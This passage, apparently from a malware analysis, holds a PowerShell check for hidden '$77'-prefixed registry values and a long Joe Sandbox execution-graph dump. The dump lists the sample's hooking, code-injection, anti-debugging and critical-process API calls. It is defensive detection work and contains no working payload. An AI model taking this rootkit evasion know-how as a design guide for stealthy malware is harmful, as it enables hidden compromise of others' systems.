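$key.Close()

if ($hits) { $hits | Format-Table -AutoSize } else { "no `$77* values under HKLM\$subkey" }
```

The check reads the value data rather than only listing names so that a hit can be triaged immediately: a REG_BINARY value whose first two bytes are "MZ" is an embedded executable and worth carving out for analysis, which matches the "EXE" resource type this stager reads the payload from.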

                                                                                                                                  Control-flow Graph

Control-flow graph: block 7c118e-7c119b: GetModuleHandleA; branches to 7c119d-7c11a9 (GetProcAddress) or to 7c11aa-7c11ac
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,007C1178,?), ref: 007C1193
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 007C11A3
Strings
• ntdll.dll, ref: 007C1193
• RtlGetVersion, ref: 007C11A3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                  • API String ID: 1646373207-1489217083
                                                                                                                                  • Opcode ID: 78b3e20d6ef7dedabfa347a9593490063c850becfcc37b955475a554c3968e53
                                                                                                                                  • Instruction ID: 9a5c7b238da495da178df867b2370e3c15de28ad742573862f0d171fd8728405
                                                                                                                                  • Opcode Fuzzy Hash: 78b3e20d6ef7dedabfa347a9593490063c850becfcc37b955475a554c3968e53
                                                                                                                                  • Instruction Fuzzy Hash: 60C092E0F80708DFAF512FB0AD0DF162B986A45B0238C846EB206D019BDEACC442D524

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:20.6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:12.8%
                                                                                                                                  Total number of Nodes:1398
                                                                                                                                  Total number of Limit Nodes:24
execution_graph (1398 nodes; the rendered graph is reduced here to its API-labelled entry points, node ids and edges omitted):
• 1c5627d4: NtQueryDirectoryFileEx, then GetFileType, StrCpyW, GetFinalPathNameByHandleW (1c561ad0), StrCmpNIW (1c563d4c), StrCmpIW / PathCombineW / StrCpyW / StrCatW (1c5634d8), lstrlenW
• 1c5624f0: NtQueryDirectoryFile, then GetFileType, StrCpyW and the same 1c561ad0 / 1c563d4c / 1c5634d8 / 1c561dd0 string-comparison subcalls
• 1c562b6c: NtEnumerateValueKey, re-invoked at 1c562bc6, results compared with StrCmpNIW (1c563d4c)
• 1c562214: NtQuerySystemInformation, StrCmpNIW (1c5622a1), GetProcessHeap / HeapAlloc / NtQuerySystemInformation / RtlFreeHeap (1c563398), StrCmpIW / StrCmpW (1c561530)
• 1c562dd0: NtDeviceIoControlFile, GetModuleHandleA, GetProcAddress, StrCmpNIW, lstrlenW, StrCmpIW / StrCmpW (1c561cf8), OpenProcess path (1c561a30)
• 1c563178: PdhGetCounterInfoW (twice, with GetProcessHeap / HeapAlloc / HeapFree), StrCmpW, StrCmpNW, StrStrW, StrToIntW; then 1c561a30: OpenProcess, K32GetProcessImageFileNameW, PathFindFileNameW, lstrlenW, StrCpyW, CloseHandle
• 1c5661f0: SetThreadContext (1c566266), VirtualProtect + FlushInstructionCache (1c566341, and 1c565322 under GetCurrentProcess at 1c5652f0), ResumeThread (1c566437), VirtualFree (1c564912); error path 1c567e30: IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
• 1c565a4d: VirtualProtect (1c565b37), GetLastError
• 1c5640e0: VirtualQuery, GetLastError
• 7ffb4adf7b41: CheckRemoteDebuggerPresent (7ffb4adf7b5f)
• 1c56e9f0: GetCommandLineA, GetCommandLineW
• remaining nodes are CRT / runtime support: _invalid_parameter_noinfo, __free_lconv_num, __std_exception_copy, __CxxCallCatchBlock, __FrameHandler3 unwinding (RtlLookupFunctionEntry, RtlUnwindEx, RaiseException, RtlPcToFileHeader, EncodePointer), __vcrt_FlsAlloc (LoadLibraryExW, GetProcAddress, FreeLibrary, TlsAlloc, TlsGetValue, TlsSetValue, FlsGetValue, FlsSetValue), __scrt_dllmain_exception_filter, critical-section setup (InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, EnterCriticalSection, DeleteCriticalSection), heap (HeapAlloc, HeapFree, GetLastError, SetLastError), and code-page / locale initialisation (GetEnvironmentStringsW, FreeEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, GetStringTypeW, LCMapStringW)
14020->14021 14022 1c56c0b4 14 API calls 14021->14022 14022->14016 14743 1c57461e 14744 1c5690e4 __CxxCallCatchBlock 9 API calls 14743->14744 14745 1c57462c 14744->14745 14746 1c574637 14745->14746 14747 1c5690e4 __CxxCallCatchBlock 9 API calls 14745->14747 14747->14746 14490 1c56f49c 14491 1c56f4a8 14490->14491 14493 1c56f4cf 14491->14493 14494 1c5719cc 14491->14494 14495 1c5719d1 14494->14495 14496 1c571a0c 14494->14496 14497 1c571a04 14495->14497 14498 1c5719f2 DeleteCriticalSection 14495->14498 14496->14491 14499 1c56d060 __free_lconv_num 13 API calls 14497->14499 14498->14497 14498->14498 14499->14496 14023 1c56d418 14024 1c56d43d 14023->14024 14029 1c56d454 14023->14029 14025 1c56cfb4 __free_lconv_num 13 API calls 14024->14025 14026 1c56d442 14025->14026 14056 1c56ce0c 14026->14056 14027 1c56d4e4 14158 1c56b914 14027->14158 14029->14027 14038 1c56d49a 14029->14038 14040 1c56d576 14029->14040 14059 1c56d654 14029->14059 14121 1c56d7d8 14029->14121 14031 1c56d44d 14034 1c56d544 14037 1c56d060 __free_lconv_num 13 API calls 14034->14037 14036 1c56d5f6 14041 1c56d060 __free_lconv_num 13 API calls 14036->14041 14039 1c56d54b 14037->14039 14042 1c56d4bd 14038->14042 14047 1c56d060 __free_lconv_num 13 API calls 14038->14047 14039->14042 14048 1c56d060 __free_lconv_num 13 API calls 14039->14048 14040->14042 14046 1c56d060 __free_lconv_num 13 API calls 14040->14046 14044 1c56d601 14041->14044 14049 1c56d060 __free_lconv_num 13 API calls 14042->14049 14043 1c56d597 14043->14036 14043->14043 14053 1c56d63c 14043->14053 14164 1c570c78 14043->14164 14045 1c56d61a 14044->14045 14050 1c56d060 __free_lconv_num 13 API calls 14044->14050 14051 1c56d060 __free_lconv_num 13 API calls 14045->14051 14046->14040 14047->14038 14048->14039 14049->14031 14050->14044 14051->14031 14173 1c56ce2c IsProcessorFeaturePresent 14053->14173 14177 1c56ccb8 14056->14177 14060 1c56d682 14059->14060 14060->14060 14061 1c56d69e 14060->14061 14062 1c56cfe0 _invalid_parameter_noinfo 13 API calls 
14060->14062 14061->14029 14063 1c56d6cd 14062->14063 14064 1c56d6e6 14063->14064 14066 1c570c78 38 API calls 14063->14066 14065 1c570c78 38 API calls 14064->14065 14076 1c56d7bc 14064->14076 14067 1c56d703 14065->14067 14066->14064 14069 1c56d722 14067->14069 14070 1c56d74d 14067->14070 14067->14076 14089 1c56d73f 14067->14089 14068 1c56ce2c _invalid_parameter_noinfo 17 API calls 14073 1c56d7d7 14068->14073 14071 1c56cfe0 _invalid_parameter_noinfo 13 API calls 14069->14071 14085 1c56d737 14070->14085 14243 1c56eca0 14070->14243 14075 1c56d72d 14071->14075 14072 1c56d060 __free_lconv_num 13 API calls 14072->14076 14078 1c56d83a 14073->14078 14252 1c571198 14073->14252 14074 1c56d060 __free_lconv_num 13 API calls 14074->14089 14079 1c56d060 __free_lconv_num 13 API calls 14075->14079 14076->14068 14084 1c56d84c 14078->14084 14091 1c56d861 _invalid_parameter_noinfo 14078->14091 14079->14085 14080 1c56d775 14081 1c56d790 14080->14081 14082 1c56d77a 14080->14082 14087 1c56d060 __free_lconv_num 13 API calls 14081->14087 14086 1c56d060 __free_lconv_num 13 API calls 14082->14086 14088 1c56d654 52 API calls 14084->14088 14085->14074 14085->14089 14086->14085 14087->14089 14090 1c56d85c 14088->14090 14089->14072 14093 1c567e30 _invalid_parameter_noinfo 8 API calls 14090->14093 14261 1c56db38 14091->14261 14094 1c56db24 14093->14094 14094->14029 14096 1c56d8da 14273 1c56d0cc 14096->14273 14100 1c56d968 14101 1c56d654 52 API calls 14100->14101 14103 1c56d978 14101->14103 14102 1c56db38 14 API calls 14109 1c56d992 14102->14109 14103->14090 14104 1c56d060 __free_lconv_num 13 API calls 14103->14104 14104->14090 14105 1c56ef58 9 API calls 14105->14109 14107 1c56d654 52 API calls 14107->14109 14108 1c56da88 FindNextFileW 14108->14109 14111 1c56daa0 14108->14111 14109->14102 14109->14105 14109->14107 14109->14108 14110 1c56daea 14109->14110 14112 1c56d060 13 API calls __free_lconv_num 14109->14112 14295 1c56d26c 14109->14295 14114 1c56daf8 FindClose 14110->14114 14118 1c56d060 
__free_lconv_num 13 API calls 14110->14118 14113 1c56dacc FindClose 14111->14113 14317 1c5708e0 14111->14317 14112->14109 14113->14090 14117 1c56dadc 14113->14117 14114->14090 14115 1c56db08 14114->14115 14119 1c56d060 __free_lconv_num 13 API calls 14115->14119 14120 1c56d060 __free_lconv_num 13 API calls 14117->14120 14118->14114 14119->14090 14120->14090 14122 1c56d83a 14121->14122 14123 1c56d818 14121->14123 14125 1c56d84c 14122->14125 14127 1c56d861 _invalid_parameter_noinfo 14122->14127 14123->14122 14124 1c571198 38 API calls 14123->14124 14124->14123 14126 1c56d654 56 API calls 14125->14126 14150 1c56d85c 14126->14150 14128 1c56db38 14 API calls 14127->14128 14131 1c56d8cb 14128->14131 14129 1c567e30 _invalid_parameter_noinfo 8 API calls 14130 1c56db24 14129->14130 14130->14029 14132 1c56d8da 14131->14132 14133 1c56ef58 9 API calls 14131->14133 14134 1c56d0cc 16 API calls 14132->14134 14133->14132 14135 1c56d93b FindFirstFileExW 14134->14135 14136 1c56d968 14135->14136 14142 1c56d992 14135->14142 14137 1c56d654 56 API calls 14136->14137 14139 1c56d978 14137->14139 14138 1c56db38 14 API calls 14138->14142 14140 1c56d060 __free_lconv_num 13 API calls 14139->14140 14139->14150 14140->14150 14141 1c56ef58 9 API calls 14141->14142 14142->14138 14142->14141 14143 1c56d26c 16 API calls 14142->14143 14144 1c56d654 56 API calls 14142->14144 14145 1c56da88 FindNextFileW 14142->14145 14146 1c56daea 14142->14146 14152 1c56d060 13 API calls __free_lconv_num 14142->14152 14143->14142 14144->14142 14145->14142 14147 1c56daa0 14145->14147 14149 1c56daf8 FindClose 14146->14149 14155 1c56d060 __free_lconv_num 13 API calls 14146->14155 14148 1c56dacc FindClose 14147->14148 14153 1c5708e0 38 API calls 14147->14153 14148->14150 14154 1c56dadc 14148->14154 14149->14150 14151 1c56db08 14149->14151 14150->14129 14156 1c56d060 __free_lconv_num 13 API calls 14151->14156 14152->14142 14153->14148 14157 1c56d060 __free_lconv_num 13 API calls 14154->14157 14155->14149 14156->14150 
14157->14150 14159 1c56b92c 14158->14159 14160 1c56b964 14158->14160 14159->14160 14161 1c56cfe0 _invalid_parameter_noinfo 13 API calls 14159->14161 14160->14034 14160->14043 14162 1c56b95a 14161->14162 14163 1c56d060 __free_lconv_num 13 API calls 14162->14163 14163->14160 14168 1c570c95 14164->14168 14165 1c570c9a 14166 1c570cb0 14165->14166 14167 1c56cfb4 __free_lconv_num 13 API calls 14165->14167 14166->14043 14169 1c570ca4 14167->14169 14168->14165 14168->14166 14171 1c570ce4 14168->14171 14170 1c56ce0c _invalid_parameter_noinfo 38 API calls 14169->14170 14170->14166 14171->14166 14172 1c56cfb4 __free_lconv_num 13 API calls 14171->14172 14172->14169 14174 1c56ce3f 14173->14174 14384 1c56cb40 14174->14384 14178 1c56cce3 14177->14178 14185 1c56cd54 14178->14185 14180 1c56cd0a 14181 1c56cd2d 14180->14181 14195 1c56c1a0 14180->14195 14183 1c56cd42 14181->14183 14184 1c56c1a0 _invalid_parameter_noinfo 17 API calls 14181->14184 14183->14031 14184->14183 14208 1c56ca88 14185->14208 14190 1c56cd8f 14190->14180 14191 1c56ce2c _invalid_parameter_noinfo 17 API calls 14192 1c56ce0a 14191->14192 14193 1c56ccb8 _invalid_parameter_noinfo 38 API calls 14192->14193 14194 1c56ce25 14193->14194 14194->14180 14196 1c56c1af GetLastError 14195->14196 14197 1c56c1f8 14195->14197 14198 1c56c1c4 14196->14198 14197->14181 14199 1c56c960 _invalid_parameter_noinfo 14 API calls 14198->14199 14200 1c56c1de SetLastError 14199->14200 14200->14197 14201 1c56c201 14200->14201 14202 1c56c1a0 _invalid_parameter_noinfo 15 API calls 14201->14202 14203 1c56c227 14202->14203 14222 1c56fda8 14203->14222 14209 1c56caa4 GetLastError 14208->14209 14210 1c56cadf 14208->14210 14211 1c56cab4 14209->14211 14210->14190 14214 1c56caf4 14210->14214 14217 1c56c960 14211->14217 14215 1c56cb10 GetLastError SetLastError 14214->14215 14216 1c56cb28 14214->14216 14215->14216 14216->14190 14216->14191 14218 1c56c988 FlsGetValue 14217->14218 14220 1c56c984 14217->14220 14218->14220 14219 1c56c99e SetLastError 
14219->14210 14220->14219 14221 1c56c700 _invalid_parameter_noinfo 13 API calls 14220->14221 14221->14219 14223 1c56fdc1 14222->14223 14225 1c56c24f 14222->14225 14223->14225 14230 1c570800 14223->14230 14226 1c56fe14 14225->14226 14227 1c56c25f 14226->14227 14228 1c56fe2d 14226->14228 14227->14181 14228->14227 14240 1c56e684 14228->14240 14231 1c56c870 _invalid_parameter_noinfo 14 API calls 14230->14231 14232 1c57080f 14231->14232 14238 1c570855 14232->14238 14239 1c56c318 EnterCriticalSection 14232->14239 14238->14225 14241 1c56c870 _invalid_parameter_noinfo 14 API calls 14240->14241 14242 1c56e68d 14241->14242 14244 1c56ecc2 14243->14244 14245 1c56ecdf 14243->14245 14244->14245 14246 1c56ecd0 14244->14246 14247 1c56ece9 14245->14247 14325 1c5717b0 14245->14325 14248 1c56cfb4 __free_lconv_num 13 API calls 14246->14248 14332 1c571800 14247->14332 14251 1c56ecd5 _invalid_parameter_noinfo 14248->14251 14251->14080 14253 1c5711a0 14252->14253 14254 1c5711b5 14253->14254 14255 1c5711ce 14253->14255 14256 1c56cfb4 __free_lconv_num 13 API calls 14254->14256 14257 1c5711c5 14255->14257 14259 1c56db38 14 API calls 14255->14259 14258 1c5711ba 14256->14258 14257->14073 14260 1c56ce0c _invalid_parameter_noinfo 38 API calls 14258->14260 14259->14257 14260->14257 14262 1c56d8cb 14261->14262 14263 1c56db5c 14261->14263 14262->14096 14269 1c56ef58 14262->14269 14263->14262 14264 1c56c870 _invalid_parameter_noinfo 14 API calls 14263->14264 14265 1c56db77 14264->14265 14351 1c56fd74 14265->14351 14270 1c56ef8a 14269->14270 14271 1c56ef69 14269->14271 14270->14096 14271->14270 14359 1c56ed48 14271->14359 14274 1c56d0f6 14273->14274 14275 1c56d11a 14273->14275 14279 1c56d060 __free_lconv_num 13 API calls 14274->14279 14282 1c56d105 FindFirstFileExW 14274->14282 14276 1c56d17f 14275->14276 14277 1c56d11f 14275->14277 14378 1c56ea18 14276->14378 14280 1c56d134 14277->14280 14277->14282 14283 1c56d060 __free_lconv_num 13 API calls 14277->14283 14279->14282 14284 1c56c390 14 API calls 
14280->14284 14282->14100 14282->14109 14283->14280 14284->14282 14296 1c56d296 14295->14296 14297 1c56d2ba 14295->14297 14300 1c56d060 __free_lconv_num 13 API calls 14296->14300 14302 1c56d2a5 14296->14302 14298 1c56d2c0 14297->14298 14299 1c56d31f 14297->14299 14298->14302 14304 1c56d060 __free_lconv_num 13 API calls 14298->14304 14309 1c56d2d5 14298->14309 14381 1c56eaa8 14299->14381 14300->14302 14302->14109 14304->14309 14305 1c56c390 14 API calls 14305->14302 14309->14305 14318 1c570912 14317->14318 14319 1c56cfb4 __free_lconv_num 13 API calls 14318->14319 14324 1c570927 _invalid_parameter_noinfo 14318->14324 14320 1c57091c 14319->14320 14321 1c56ce0c _invalid_parameter_noinfo 38 API calls 14320->14321 14321->14324 14322 1c567e30 _invalid_parameter_noinfo 8 API calls 14323 1c570c68 14322->14323 14323->14113 14324->14322 14326 1c5717d2 HeapSize 14325->14326 14327 1c5717b9 14325->14327 14328 1c56cfb4 __free_lconv_num 13 API calls 14327->14328 14329 1c5717be 14328->14329 14330 1c56ce0c _invalid_parameter_noinfo 38 API calls 14329->14330 14331 1c5717c9 14330->14331 14331->14247 14333 1c571815 14332->14333 14334 1c57181f 14332->14334 14344 1c56c390 14333->14344 14336 1c571824 14334->14336 14342 1c57182b _invalid_parameter_noinfo 14334->14342 14339 1c56d060 __free_lconv_num 13 API calls 14336->14339 14337 1c571831 14341 1c56cfb4 __free_lconv_num 13 API calls 14337->14341 14338 1c57185e HeapReAlloc 14340 1c57181d 14338->14340 14338->14342 14339->14340 14340->14251 14341->14340 14342->14337 14342->14338 14343 1c56b230 _invalid_parameter_noinfo 2 API calls 14342->14343 14343->14342 14345 1c56c3db 14344->14345 14350 1c56c39f _invalid_parameter_noinfo 14344->14350 14347 1c56cfb4 __free_lconv_num 13 API calls 14345->14347 14346 1c56c3c2 HeapAlloc 14348 1c56c3d9 14346->14348 14346->14350 14347->14348 14348->14340 14349 1c56b230 _invalid_parameter_noinfo 2 API calls 14349->14350 14350->14345 14350->14346 14350->14349 14352 1c56db9a 14351->14352 14353 1c56fd89 14351->14353 
14355 1c56fde0 14352->14355 14353->14352 14354 1c570800 _invalid_parameter_noinfo 14 API calls 14353->14354 14354->14352 14356 1c56fdf5 14355->14356 14357 1c56fe08 14355->14357 14356->14357 14358 1c56e684 _invalid_parameter_noinfo 14 API calls 14356->14358 14357->14262 14358->14357 14360 1c56ee38 14359->14360 14371 1c56ed7d __vcrt_FlsAlloc 14359->14371 14377 1c56c318 EnterCriticalSection 14360->14377 14362 1c56eda2 LoadLibraryExW 14365 1c56eec7 14362->14365 14366 1c56edc7 GetLastError 14362->14366 14364 1c56eee0 GetProcAddress 14364->14360 14365->14364 14367 1c56eed7 FreeLibrary 14365->14367 14366->14371 14367->14364 14371->14360 14371->14362 14371->14364 14375 1c56ee01 LoadLibraryExW 14371->14375 14375->14365 14375->14371 14379 1c56ea21 MultiByteToWideChar 14378->14379 14382 1c56eacc WideCharToMultiByte 14381->14382 14385 1c56cb7a _invalid_parameter_noinfo 14384->14385 14386 1c56cba2 RtlCaptureContext RtlLookupFunctionEntry 14385->14386 14387 1c56cc24 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14386->14387 14388 1c56cbee RtlVirtualUnwind 14386->14388 14389 1c56cc76 _invalid_parameter_noinfo 14387->14389 14388->14387 14390 1c567e30 _invalid_parameter_noinfo 8 API calls 14389->14390 14391 1c56cc95 GetCurrentProcess TerminateProcess 14390->14391 15241 1c56bf98 15242 1c56bfc9 15241->15242 15243 1c56bfb1 15241->15243 15243->15242 15244 1c56d060 __free_lconv_num 13 API calls 15243->15244 15244->15242 14392 1c56ac02 14393 1c5690e4 __CxxCallCatchBlock 9 API calls 14392->14393 14395 1c56ac0f __CxxCallCatchBlock 14393->14395 14394 1c56ac53 RaiseException 14396 1c56ac7a 14394->14396 14395->14394 14405 1c569738 14396->14405 14398 1c56acab __CxxCallCatchBlock 14399 1c5690e4 __CxxCallCatchBlock 9 API calls 14398->14399 14400 1c56acbe 14399->14400 14402 1c5690e4 __CxxCallCatchBlock 9 API calls 14400->14402 14404 1c56acc7 14402->14404 14406 1c5690e4 __CxxCallCatchBlock 9 API calls 14405->14406 14407 1c56974a 14406->14407 14408 1c569785 14407->14408 
14409 1c5690e4 __CxxCallCatchBlock 9 API calls 14407->14409 14410 1c569755 14409->14410 14410->14408 14411 1c5690e4 __CxxCallCatchBlock 9 API calls 14410->14411 14412 1c569776 14411->14412 14412->14398 14413 1c568db8 14412->14413 14414 1c5690e4 __CxxCallCatchBlock 9 API calls 14413->14414 14415 1c568dc6 14414->14415 14415->14398 14661 1c574582 14662 1c569738 __CxxCallCatchBlock 9 API calls 14661->14662 14663 1c574595 14662->14663 14667 1c568db8 __CxxCallCatchBlock 9 API calls 14663->14667 14669 1c5745d4 __CxxCallCatchBlock 14663->14669 14664 1c5690e4 __CxxCallCatchBlock 9 API calls 14665 1c5745e8 14664->14665 14666 1c5690e4 __CxxCallCatchBlock 9 API calls 14665->14666 14668 1c5745f8 14666->14668 14667->14669 14669->14664 14573 1c56fd00 14574 1c56fd0b 14573->14574 14582 1c5729e4 14574->14582 14595 1c56c318 EnterCriticalSection 14582->14595 14748 1c56f200 GetProcessHeap 15245 1c567f80 15246 1c567f89 __scrt_acquire_startup_lock 15245->15246 15248 1c567f8d 15246->15248 15249 1c56b974 15246->15249 15250 1c56b994 15249->15250 15277 1c56b9ad 15249->15277 15251 1c56b9b2 15250->15251 15252 1c56b99c 15250->15252 15253 1c56e624 56 API calls 15251->15253 15254 1c56cfb4 __free_lconv_num 13 API calls 15252->15254 15256 1c56b9b7 15253->15256 15255 1c56b9a1 15254->15255 15257 1c56ce0c _invalid_parameter_noinfo 38 API calls 15255->15257 15278 1c56dcf8 GetModuleFileNameW 15256->15278 15257->15277 15262 1c56b914 13 API calls 15263 1c56ba21 15262->15263 15264 1c56ba3a 15263->15264 15265 1c56ba29 15263->15265 15267 1c56b754 14 API calls 15264->15267 15266 1c56cfb4 __free_lconv_num 13 API calls 15265->15266 15268 1c56ba2e 15266->15268 15270 1c56ba56 15267->15270 15269 1c56d060 __free_lconv_num 13 API calls 15268->15269 15269->15277 15270->15268 15271 1c56ba86 15270->15271 15272 1c56ba9f 15270->15272 15273 1c56d060 __free_lconv_num 13 API calls 15271->15273 15274 1c56d060 __free_lconv_num 13 API calls 15272->15274 15275 1c56ba8f 15273->15275 15274->15268 15276 1c56d060 __free_lconv_num 
13 API calls 15275->15276 15276->15277 15277->15248 15279 1c56dd51 15278->15279 15280 1c56dd3d GetLastError 15278->15280 15282 1c56db38 14 API calls 15279->15282 15296 1c56cf44 15280->15296 15283 1c56dd7f 15282->15283 15284 1c56ef58 9 API calls 15283->15284 15289 1c56dd90 15283->15289 15284->15289 15285 1c567e30 _invalid_parameter_noinfo 8 API calls 15287 1c56b9ce 15285->15287 15290 1c56b754 15287->15290 15288 1c56dd4a 15288->15285 15301 1c56dbdc 15289->15301 15292 1c56b792 15290->15292 15294 1c56b7f8 15292->15294 15318 1c56e9dc 15292->15318 15293 1c56b8e5 15293->15262 15294->15293 15295 1c56e9dc 14 API calls 15294->15295 15295->15294 15315 1c56cf90 15296->15315 15298 1c56cf51 __free_lconv_num 15299 1c56cfb4 __free_lconv_num 13 API calls 15298->15299 15300 1c56cf61 15299->15300 15300->15288 15302 1c56dc1b 15301->15302 15304 1c56dc00 15301->15304 15303 1c56dc20 15302->15303 15305 1c56eaa8 WideCharToMultiByte 15302->15305 15303->15304 15307 1c56cfb4 __free_lconv_num 13 API calls 15303->15307 15304->15288 15306 1c56dc77 15305->15306 15306->15303 15308 1c56dc7e GetLastError 15306->15308 15309 1c56dca9 15306->15309 15307->15304 15310 1c56cf44 13 API calls 15308->15310 15311 1c56eaa8 WideCharToMultiByte 15309->15311 15312 1c56dc8b 15310->15312 15314 1c56dcd0 15311->15314 15313 1c56cfb4 __free_lconv_num 13 API calls 15312->15313 15313->15304 15314->15304 15314->15308 15316 1c56c8d0 __free_lconv_num 13 API calls 15315->15316 15317 1c56cf99 15316->15317 15317->15298 15319 1c56e968 15318->15319 15320 1c56db38 14 API calls 15319->15320 15321 1c56e98c 15320->15321 15321->15292 15072 1c57470f 15073 1c57471e 15072->15073 15074 1c574728 15072->15074 15076 1c56c36c LeaveCriticalSection 15073->15076 14416 1c56800c 14417 1c568030 __scrt_acquire_startup_lock 14416->14417 14418 1c56b341 14417->14418 14419 1c56c8d0 __free_lconv_num 13 API calls 14417->14419 14420 1c56b36a 14419->14420 14670 1c565d8c 14671 1c565d93 14670->14671 14672 1c565cd0 14671->14672 14673 1c565dc0 VirtualProtect 
14671->14673 14673->14672 14674 1c565de9 GetLastError 14673->14674 14674->14672 15042 1c563288 15043 1c5632b8 15042->15043 15044 1c563371 15043->15044 15045 1c5632d5 PdhGetCounterInfoW 15043->15045 15045->15044 15046 1c5632f3 GetProcessHeap HeapAlloc PdhGetCounterInfoW 15045->15046 15047 1c563325 StrCmpW 15046->15047 15048 1c56335d GetProcessHeap HeapFree 15046->15048 15047->15048 15050 1c56333a 15047->15050 15048->15044 15049 1c563720 12 API calls 15049->15050 15050->15048 15050->15049 15077 1c56ab08 15078 1c5690e4 __CxxCallCatchBlock 9 API calls 15077->15078 15079 1c56ab3d 15078->15079 15080 1c5690e4 __CxxCallCatchBlock 9 API calls 15079->15080 15081 1c56ab4b __except_validate_context_record 15080->15081 15082 1c5690e4 __CxxCallCatchBlock 9 API calls 15081->15082 15083 1c56ab8f 15082->15083 15084 1c5690e4 __CxxCallCatchBlock 9 API calls 15083->15084 15085 1c56ab98 15084->15085 15086 1c5690e4 __CxxCallCatchBlock 9 API calls 15085->15086 15087 1c56aba1 15086->15087 15100 1c5696fc 15087->15100 15090 1c5690e4 __CxxCallCatchBlock 9 API calls 15091 1c56abd1 __CxxCallCatchBlock 15090->15091 15092 1c569738 __CxxCallCatchBlock 9 API calls 15091->15092 15096 1c56ac82 15092->15096 15093 1c56acab __CxxCallCatchBlock 15094 1c5690e4 __CxxCallCatchBlock 9 API calls 15093->15094 15095 1c56acbe 15094->15095 15097 1c5690e4 __CxxCallCatchBlock 9 API calls 15095->15097 15096->15093 15098 1c568db8 __CxxCallCatchBlock 9 API calls 15096->15098 15099 1c56acc7 15097->15099 15098->15093 15101 1c5690e4 __CxxCallCatchBlock 9 API calls 15100->15101 15102 1c56970d 15101->15102 15103 1c569718 15102->15103 15104 1c5690e4 __CxxCallCatchBlock 9 API calls 15102->15104 15105 1c5690e4 __CxxCallCatchBlock 9 API calls 15103->15105 15104->15103 15106 1c569729 15105->15106 15106->15090 15106->15091 14749 1c574608 14752 1c568e0c 14749->14752 14753 1c568e36 14752->14753 14754 1c568e24 14752->14754 14756 1c5690e4 __CxxCallCatchBlock 9 API calls 14753->14756 14754->14753 14755 1c568e2c 14754->14755 14757 
1c568e34 14755->14757 14759 1c5690e4 __CxxCallCatchBlock 9 API calls 14755->14759 14758 1c568e3b 14756->14758 14758->14757 14760 1c5690e4 __CxxCallCatchBlock 9 API calls 14758->14760 14761 1c568e5b 14759->14761 14760->14757 14762 1c5690e4 __CxxCallCatchBlock 9 API calls 14761->14762 14763 1c568e68 14762->14763 14764 1c56c0b4 14 API calls 14763->14764 14765 1c568e71 14764->14765 14766 1c56c0b4 14 API calls 14765->14766 14767 1c568e7d 14766->14767 13608 7ffb4adfb6a9 13609 7ffb4adfb6b4 13608->13609 13610 7ffb4adfb7e2 RtlSetProcessIsCritical 13609->13610 13611 7ffb4adfb842 13610->13611 14421 1c562c34 14423 1c562c88 14421->14423 14422 1c562ca3 14423->14422 14425 1c5635c4 14423->14425 14426 1c56365a 14425->14426 14428 1c5635e9 14425->14428 14426->14422 14427 1c563d4c StrCmpNIW 14427->14428 14428->14426 14428->14427 14429 1c561e04 StrCmpIW StrCmpW 14428->14429 14429->14428 14500 1c5744b5 14501 1c5690e4 __CxxCallCatchBlock 9 API calls 14500->14501 14502 1c5744cd 14501->14502 14503 1c5690e4 __CxxCallCatchBlock 9 API calls 14502->14503 14504 1c5744e8 14503->14504 14505 1c5690e4 __CxxCallCatchBlock 9 API calls 14504->14505 14506 1c5744fc 14505->14506 14507 1c5690e4 __CxxCallCatchBlock 9 API calls 14506->14507 14508 1c57453e 14507->14508 15107 1c565734 15108 1c56573a 15107->15108 15119 1c567d60 15108->15119 15113 1c565837 _invalid_parameter_noinfo 15115 1c5659bd 15113->15115 15118 1c56579e 15113->15118 15132 1c567940 15113->15132 15114 1c565abb 15115->15114 15116 1c565b37 VirtualProtect 15115->15116 15117 1c565b63 GetLastError 15116->15117 15116->15118 15117->15118 15120 1c567d6b 15119->15120 15121 1c56577d 15120->15121 15122 1c56b230 _invalid_parameter_noinfo 2 API calls 15120->15122 15123 1c567d8a 15120->15123 15121->15118 15128 1c5641c0 15121->15128 15122->15120 15124 1c567d95 15123->15124 15138 1c568578 15123->15138 15142 1c568598 15124->15142 15129 1c5641dd 15128->15129 15131 1c56424c _invalid_parameter_noinfo 15129->15131 15146 1c564430 15129->15146 15131->15113 15133 
1c567987 15132->15133 15171 1c567710 15133->15171 15136 1c567e30 _invalid_parameter_noinfo 8 API calls 15137 1c5679b1 15136->15137 15137->15113 15139 1c568586 std::bad_alloc::bad_alloc 15138->15139 15140 1c568f38 Concurrency::cancel_current_task 2 API calls 15139->15140 15141 1c568597 15140->15141 15143 1c5685a6 std::bad_alloc::bad_alloc 15142->15143 15144 1c568f38 Concurrency::cancel_current_task 2 API calls 15143->15144 15145 1c567d9b 15144->15145 15147 1c564454 15146->15147 15153 1c564477 15146->15153 15147->15153 15160 1c563ee0 15147->15160 15148 1c5644ad 15149 1c5644dd 15148->15149 15154 1c564010 2 API calls 15148->15154 15152 1c564513 15149->15152 15157 1c563ee0 3 API calls 15149->15157 15155 1c56452f 15152->15155 15158 1c563ee0 3 API calls 15152->15158 15153->15148 15166 1c564010 15153->15166 15154->15149 15156 1c56454b 15155->15156 15159 1c564010 2 API calls 15155->15159 15156->15131 15157->15152 15158->15155 15159->15156 15161 1c563f01 _invalid_parameter_noinfo 15160->15161 15162 